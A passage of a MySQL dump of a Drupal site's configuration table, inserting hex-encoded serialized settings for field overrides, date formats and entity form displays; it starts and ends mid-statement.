('', 'core.base_field_override.node.slider.promote', 0x613a31363a7b733a343a2275756964223b733a33363a2238303265646665352d636164382d343339362d396666632d346362616564313730636530223b733a383a226c616e67636f6465223b733a323a226b6f223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226e6f64652e747970652e736c69646572223b7d7d733a323a226964223b733a31393a226e6f64652e736c696465722e70726f6d6f7465223b733a31303a226669656c645f6e616d65223b733a373a2270726f6d6f7465223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a363a22736c69646572223b733a353a226c6162656c223b733a32323a2250726f6d6f74656420746f2066726f6e742070616765223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b693a303b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b733a323a224f6e223b733a393a226f66665f6c6162656c223b733a333a224f6666223b7d733a31303a226669656c645f74797065223b733a373a22626f6f6c65616e223b7d);
INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('', 'core.base_field_override.shortcut.default.title', 0x613a31363a7b733a343a2275756964223b733a33363a2265383762383033372d623062332d346139332d383331352d663033353263336136393033223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a32303a2273686f72746375742e7365742e64656661756c74223b7d7d733a323a226964223b733a32323a2273686f72746375742e64656661756c742e7469746c65223b733a31303a226669656c645f6e616d65223b733a353a227469746c65223b733a31313a22656e746974795f74797065223b733a383a2273686f7274637574223b733a363a2262756e646c65223b733a373a2264656661756c74223b733a353a226c6162656c223b733a343a224e616d65223b733a31313a226465736372697074696f6e223b733a32353a22546865206e616d65206f66207468652073686f72746375742e223b733a383a227265717569726564223b623a313b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a363a22737472696e67223b7d),
('', 'core.base_field_override.taxonomy_term.tags.changed', 0x613a31363a7b733a343a2275756964223b733a33363a2231393332343236332d333632352d343161322d613730312d313239623238303532373462223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a32343a227461786f6e6f6d792e766f636162756c6172792e74616773223b7d7d733a323a226964223b733a32363a227461786f6e6f6d795f7465726d2e746167732e6368616e676564223b733a31303a226669656c645f6e616d65223b733a373a226368616e676564223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b733a343a2274616773223b733a353a226c6162656c223b733a373a224368616e676564223b733a31313a226465736372697074696f6e223b733a33393a225468652074696d65207468617420746865207465726d20776173206c617374206564697465642e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a373a226368616e676564223b7d),
('', 'core.base_field_override.taxonomy_term.tags.description', 0x613a31363a7b733a343a2275756964223b733a33363a2238343932363165372d343137652d346165622d626530362d303066363665646666323835223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32343a227461786f6e6f6d792e766f636162756c6172792e74616773223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2274657874223b7d7d733a323a226964223b733a33303a227461786f6e6f6d795f7465726d2e746167732e6465736372697074696f6e223b733a31303a226669656c645f6e616d65223b733a31313a226465736372697074696f6e223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b733a343a2274616773223b733a353a226c6162656c223b733a31313a224465736372697074696f6e223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a393a22746578745f6c6f6e67223b7d),
('', 'core.base_field_override.taxonomy_term.tags.name', 0x613a31363a7b733a343a2275756964223b733a33363a2230373530663936322d613764372d343864352d393033612d303066636466376462653561223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a32343a227461786f6e6f6d792e766f636162756c6172792e74616773223b7d7d733a323a226964223b733a32333a227461786f6e6f6d795f7465726d2e746167732e6e616d65223b733a31303a226669656c645f6e616d65223b733a343a226e616d65223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b733a343a2274616773223b733a353a226c6162656c223b733a343a224e616d65223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a313b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a363a22737472696e67223b7d),
('', 'core.base_field_override.taxonomy_term.tags.path', 0x613a31363a7b733a343a2275756964223b733a33363a2236343134366436382d356231652d343966622d383535652d326538623230623966666636223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32343a227461786f6e6f6d792e766f636162756c6172792e74616773223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2270617468223b7d7d733a323a226964223b733a32333a227461786f6e6f6d795f7465726d2e746167732e70617468223b733a31303a226669656c645f6e616d65223b733a343a2270617468223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b733a343a2274616773223b733a353a226c6162656c223b733a393a2255524c20616c696173223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a343a2270617468223b7d),
('', 'core.base_field_override.taxonomy_term.tags.status', 0x613a31363a7b733a343a2275756964223b733a33363a2237323865646362382d383462372d343830342d396437322d393665346435343936313830223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a32343a227461786f6e6f6d792e766f636162756c6172792e74616773223b7d7d733a323a226964223b733a32353a227461786f6e6f6d795f7465726d2e746167732e737461747573223b733a31303a226669656c645f6e616d65223b733a363a22737461747573223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b733a343a2274616773223b733a353a226c6162656c223b733a393a225075626c6973686564223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b693a313b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b733a323a224f6e223b733a393a226f66665f6c6162656c223b733a333a224f6666223b7d733a31303a226669656c645f74797065223b733a373a22626f6f6c65616e223b7d),
('', 'core.base_field_override.user.user.changed', 0x613a31363a7b733a343a2275756964223b733a33363a2261376537393538322d353933352d343863642d613236612d346265333132613531636535223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a2275736572223b7d7d733a323a226964223b733a31373a22757365722e757365722e6368616e676564223b733a31303a226669656c645f6e616d65223b733a373a226368616e676564223b733a31313a22656e746974795f74797065223b733a343a2275736572223b733a363a2262756e646c65223b733a343a2275736572223b733a353a226c6162656c223b733a373a224368616e676564223b733a31313a226465736372697074696f6e223b733a33393a225468652074696d65207468617420746865207573657220776173206c617374206564697465642e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a373a226368616e676564223b7d),
('', 'core.base_field_override.user.user.path', 0x613a31363a7b733a343a2275756964223b733a33363a2239396536376664652d316234302d346532362d623436382d336537326634383733616139223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a343a2270617468223b693a313b733a343a2275736572223b7d7d733a323a226964223b733a31343a22757365722e757365722e70617468223b733a31303a226669656c645f6e616d65223b733a343a2270617468223b733a31313a22656e746974795f74797065223b733a343a2275736572223b733a363a2262756e646c65223b733a343a2275736572223b733a353a226c6162656c223b733a393a2255524c20616c696173223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a343a2270617468223b7d),
('', 'core.date_format.fallback', 0x613a393a7b733a343a2275756964223b733a33363a2237646566333162352d303264352d346439632d613461362d346430343530633136353831223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22376b6c533549575872777a56615070595a464173367763783855324646315837334f667274547376757645223b7d733a323a226964223b733a383a2266616c6c6261636b223b733a353a226c6162656c223b733a32303a2246616c6c6261636b206461746520666f726d6174223b733a363a226c6f636b6564223b623a313b733a373a227061747465726e223b733a31343a22442c206d2f642f59202d20483a69223b7d),
('', 'core.date_format.html_date', 0x613a393a7b733a343a2275756964223b733a33363a2236353236343866302d316666392d346438342d623332382d393261383736363961653639223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22454f516c745551506d67633655513272634a3458695f6c6543454a6a3575693054522d31326475532d546b223b7d733a323a226964223b733a393a2268746d6c5f64617465223b733a353a226c6162656c223b733a393a2248544d4c2044617465223b733a363a226c6f636b6564223b623a313b733a373a227061747465726e223b733a353a22592d6d2d64223b7d),
('', 'core.date_format.html_datetime', 0x613a393a7b733a343a2275756964223b733a33363a2237373633633362392d636235382d343637662d623065622d393064303562303562316434223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226a7866436c775a495258496463764d72452d2d576b635a78444755566f4f494533536d324e525a6c467545223b7d733a323a226964223b733a31333a2268746d6c5f6461746574696d65223b733a353a226c6162656c223b733a31333a2248544d4c204461746574696d65223b733a363a226c6f636b6564223b623a313b733a373a227061747465726e223b733a31333a22592d6d2d645c54483a693a734f223b7d),
('', 'core.date_format.html_month', 0x613a393a7b733a343a2275756964223b733a33363a2231393332386238382d346536632d346439662d613934382d636130303464363339666663223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a225a374b754355774d5f5764544e764c636f6c747558335f38642d732d38465a6b544e364b674e774630654d223b7d733a323a226964223b733a31303a2268746d6c5f6d6f6e7468223b733a353a226c6162656c223b733a31303a2248544d4c204d6f6e7468223b733a363a226c6f636b6564223b623a313b733a373a227061747465726e223b733a333a22592d6d223b7d),
('', 'core.date_format.html_time', 0x613a393a7b733a343a2275756964223b733a33363a2265616435373931632d363963382d343136632d393666312d353333323964363564356262223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224d3779716963596b553336685279357039647241614742426968685544314f79756a467241615139335a45223b7d733a323a226964223b733a393a2268746d6c5f74696d65223b733a353a226c6162656c223b733a393a2248544d4c2054696d65223b733a363a226c6f636b6564223b623a313b733a373a227061747465726e223b733a353a22483a693a73223b7d),
('', 'core.date_format.html_week', 0x613a393a7b733a343a2275756964223b733a33363a2232303634346131642d306137652d343363322d396230362d393235613338393862306233223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22774b443457736f565f7746677632766749346d6341414653497a7279653137796b7a6477726e41706b6659223b7d733a323a226964223b733a393a2268746d6c5f7765656b223b733a353a226c6162656c223b733a393a2248544d4c205765656b223b733a363a226c6f636b6564223b623a313b733a373a227061747465726e223b733a353a22592d5c5757223b7d),
('', 'core.date_format.html_year', 0x613a393a7b733a343a2275756964223b733a33363a2236373662613765312d633134622d346635382d383730632d623832646635376136333662223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224f6a656b695175583952625651325f386a4f48424c39345267594c65507158377770664e476763517a726b223b7d733a323a226964223b733a393a2268746d6c5f79656172223b733a353a226c6162656c223b733a393a2248544d4c2059656172223b733a363a226c6f636b6564223b623a313b733a373a227061747465726e223b733a313a2259223b7d),
('', 'core.date_format.html_yearless_date', 0x613a393a7b733a343a2275756964223b733a33363a2266396330333261642d383861322d343963352d396566622d336231383531643162363262223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2235567061774d724b504550436b6f4f3459705061305444464f32646769494866547a694a74776c6d557863223b7d733a323a226964223b733a31383a2268746d6c5f796561726c6573735f64617465223b733a353a226c6162656c223b733a31383a2248544d4c20596561726c6573732064617465223b733a363a226c6f636b6564223b623a313b733a373a227061747465726e223b733a333a226d2d64223b7d),
('', 'core.date_format.long', 0x613a393a7b733a343a2275756964223b733a33363a2238323537353930652d313633632d346432312d386364622d346535353866643331303438223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226f673873575868427548624c4d7733436f6942455a6a67715379684642466d636255575f774c63664e626f223b7d733a323a226964223b733a343a226c6f6e67223b733a353a226c6162656c223b733a31373a2244656661756c74206c6f6e672064617465223b733a363a226c6f636b6564223b623a303b733a373a227061747465726e223b733a31353a226c2c2046206a2c2059202d20483a69223b7d),
('', 'core.date_format.medium', 0x613a393a7b733a343a2275756964223b733a33363a2237336338363032622d636135302d343566372d623335302d633033346464343337393736223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226e7a4c35643032344e6a5849585f38546c5436754641753937336c6d666b6d486b6c4a432d326939724145223b7d733a323a226964223b733a363a226d656469756d223b733a353a226c6162656c223b733a31393a2244656661756c74206d656469756d2064617465223b733a363a226c6f636b6564223b623a303b733a373a227061747465726e223b733a31343a22442c206d2f642f59202d20483a69223b7d),
('', 'core.date_format.olivero_medium', 0x613a393a7b733a343a2275756964223b733a33363a2238613838393864652d316662342d343431362d613130322d656464643733323132323233223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a383a22656e666f72636564223b613a313a7b733a353a227468656d65223b613a313a7b693a303b733a373a226f6c697665726f223b7d7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224d7436636d785562445a3958784436703235575138746a335f4a635838796c66636464775a633867634145223b7d733a323a226964223b733a31343a226f6c697665726f5f6d656469756d223b733a353a226c6162656c223b733a31343a224f6c697665726f204d656469756d223b733a363a226c6f636b6564223b623a303b733a373a227061747465726e223b733a383a226a2020462c202059223b7d),
('', 'core.date_format.short', 0x613a393a7b733a343a2275756964223b733a33363a2233396333353161302d623934372d343237312d383734322d316161623665333533386663223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22416c7a657979744138496e426778494739483255444a597333434739385a6a36795273444b6d6c625a7741223b7d733a323a226964223b733a353a2273686f7274223b733a353a226c6162656c223b733a31383a2244656661756c742073686f72742064617465223b733a363a226c6f636b6564223b623a303b733a373a227061747465726e223b733a31313a226d2f642f59202d20483a69223b7d),
('', 'core.entity_form_display.block_content.basic.default', 0x613a31313a7b733a343a2275756964223b733a33363a2263343134653533372d336132362d346435652d623430302d316131373562656632666230223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a32343a22626c6f636b5f636f6e74656e742e747970652e6261736963223b693a313b733a33363a226669656c642e6669656c642e626c6f636b5f636f6e74656e742e62617369632e626f6479223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2274657874223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226a41707333464378764b65634142535f746745786268435a72424c514233624e5057773138576a45337373223b7d733a323a226964223b733a32373a22626c6f636b5f636f6e74656e742e62617369632e64656661756c74223b733a31363a22746172676574456e7469747954797065223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b733a353a226261736963223b733a343a226d6f6465223b733a373a2264656661756c74223b733a373a22636f6e74656e74223b613a333a7b733a343a22626f6479223b613a353a7b733a343a2274797065223b733a32363a22746578745f74657874617265615f776974685f73756d6d617279223b733a363a22776569676874223b693a2d343b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a343a7b733a343a22726f7773223b693a393b733a31323a2273756d6d6172795f726f7773223b693a333b733a31313a22706c616365686f6c646572223b733a303a22223b733a31323a2273686f775f73756d6d617279223b623a303b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a343a22696e666f223b613a353a7b733a343a2274797065223b733a31363a22737472696e675f746578746669656c64223b733a363a22776569676874223b693a2d353b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a323a7b733a343a2273697a65223b693a36303b733a31313a22706c616365686f6c646572223b733a303a22223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31343a22696e636c7564655f6c6f636b6564223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d7d733a363a2268696464656e223b613a303a7b7d7d),
('', 'core.entity_form_display.comment.comment.default', 0x613a31313a7b733a343a2275756964223b733a33363a2237616362333530662d633166372d343739632d623031332d323235633466353238616234223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a32303a22636f6d6d656e742e747970652e636f6d6d656e74223b693a313b733a34303a226669656c642e6669656c642e636f6d6d656e742e636f6d6d656e742e636f6d6d656e745f626f6479223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2274657874223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224930506130615176545f6a61776c506f396f7a34464533685f69636b63353564594b54506c3667494c6573223b7d733a323a226964223b733a32333a22636f6d6d656e742e636f6d6d656e742e64656661756c74223b733a31363a22746172676574456e7469747954797065223b733a373a22636f6d6d656e74223b733a363a2262756e646c65223b733a373a22636f6d6d656e74223b733a343a226d6f6465223b733a373a2264656661756c74223b733a373a22636f6e74656e74223b613a343a7b733a363a22617574686f72223b613a323a7b733a363a22776569676874223b693a2d323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a31323a22636f6d6d656e745f626f6479223b613a353a7b733a343a2274797065223b733a31333a22746578745f7465787461726561223b733a363a22776569676874223b693a31313b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a323a7b733a343a22726f7773223b693a353b733a31313a22706c616365686f6c646572223b733a303a22223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31343a22696e636c7564655f6c6f636b6564223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a373a227375626a656374223b613a353a7b733a343a2274797065223b733a31363a22737472696e675f746578746669656c64223b733a363a22776569676874223b693a31303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a323a7b733a343a2273697a65223b693a36303b733a31313a22706c616365686f6c646572223b733a303a22223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d7d733a363a2268696464656e223b613a303a7b7d7d),
('', 'core.entity_form_display.media.audio.default', 0x613a31313a7b733a343a2275756964223b733a33363a2232636235393933652d333530642d346633322d393536332d306433376662323263313434223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a34363a226669656c642e6669656c642e6d656469612e617564696f2e6669656c645f6d656469615f617564696f5f66696c65223b693a313b733a31363a226d656469612e747970652e617564696f223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a343a2266696c65223b693a313b733a343a2270617468223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2247325f534b48336a6d4939465165585355786f334b67517169794631685044456b63372d332d7243536263223b7d733a323a226964223b733a31393a226d656469612e617564696f2e64656661756c74223b733a31363a22746172676574456e7469747954797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22617564696f223b733a343a226d6f6465223b733a373a2264656661756c74223b733a373a22636f6e74656e74223b613a363a7b733a373a2263726561746564223b613a353a7b733a343a2274797065223b733a31383a226461746574696d655f74696d657374616d70223b733a363a22776569676874223b693a31303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a32323a226669656c645f6d656469615f617564696f5f66696c65223b613a353a7b733a343a2274797065223b733a31323a2266696c655f67656e65726963223b733a363a22776569676874223b693a303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31383a2270726f67726573735f696e64696361746f72223b733a383a227468726f62626572223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31343a22696e636c7564655f6c6f636b6564223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a343a2270617468223b613a353a7b733a343a2274797065223b733a343a2270617468223b733a363a22776569676874223b693a33303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a363a22737461747573223b613a353a7b733a343a2274797065223b733a31363a22626f6f6c65616e5f636865636b626f78223b733a363a22776569676874223b693a3130303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31333a22646973706c61795f6c6162656c223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a333a22756964223b613a353a7b733a343a2274797065223b733a32393a22656e746974795f7265666572656e63655f6175746f636f6d706c657465223b733a363a22776569676874223b693a353b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a343a7b733a31343a226d617463685f6f70657261746f72223b733a383a22434f4e5441494e53223b733a31313a226d617463685f6c696d6974223b693a31303b733a343a2273697a65223b693a36303b733a31313a22706c616365686f6c646572223b733a303a22223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d7d733a363a2268696464656e223b613a313a7b733a343a226e616d65223b623a313b7d7d),
('', 'core.entity_form_display.media.audio.media_library', 0x613a31313a7b733a343a2275756964223b733a33363a2231613535623836342d326264352d343333662d626230642d383531636237666162373634223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a333a7b693a303b733a34313a22636f72652e656e746974795f666f726d5f6d6f64652e6d656469612e6d656469615f6c696272617279223b693a313b733a34363a226669656c642e6669656c642e6d656469612e617564696f2e6669656c645f6d656469615f617564696f5f66696c65223b693a323b733a31363a226d656469612e747970652e617564696f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22323876774d49597476796a50634434527963695a58497a7478745a676d755752434e6759656d725f535a45223b7d733a323a226964223b733a32353a226d656469612e617564696f2e6d656469615f6c696272617279223b733a31363a22746172676574456e7469747954797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22617564696f223b733a343a226d6f6465223b733a31333a226d656469615f6c696272617279223b733a373a22636f6e74656e74223b613a313a7b733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31343a22696e636c7564655f6c6f636b6564223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d7d733a363a2268696464656e223b613a363a7b733a373a2263726561746564223b623a313b733a32323a226669656c645f6d656469615f617564696f5f66696c65223b623a313b733a343a226e616d65223b623a313b733a343a2270617468223b623a313b733a363a22737461747573223b623a313b733a333a22756964223b623a313b7d7d),
('', 'core.entity_form_display.media.document.default', 0x613a31313a7b733a343a2275756964223b733a33363a2261323138386566642d646531392d343464362d383965652d326336626134663138373434223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a34373a226669656c642e6669656c642e6d656469612e646f63756d656e742e6669656c645f6d656469615f646f63756d656e74223b693a313b733a31393a226d656469612e747970652e646f63756d656e74223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a343a2266696c65223b693a313b733a343a2270617468223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2261657772526b6550674a7a6444356b504f71384a654d634b48733679617434396e45375a6543517a515a67223b7d733a323a226964223b733a32323a226d656469612e646f63756d656e742e64656661756c74223b733a31363a22746172676574456e7469747954797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a383a22646f63756d656e74223b733a343a226d6f6465223b733a373a2264656661756c74223b733a373a22636f6e74656e74223b613a363a7b733a373a2263726561746564223b613a353a7b733a343a2274797065223b733a31383a226461746574696d655f74696d657374616d70223b733a363a22776569676874223b693a31303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a32303a226669656c645f6d656469615f646f63756d656e74223b613a353a7b733a343a2274797065223b733a31323a2266696c655f67656e65726963223b733a363a22776569676874223b693a303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31383a2270726f67726573735f696e64696361746f72223b733a383a227468726f62626572223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a383a226c616e67636f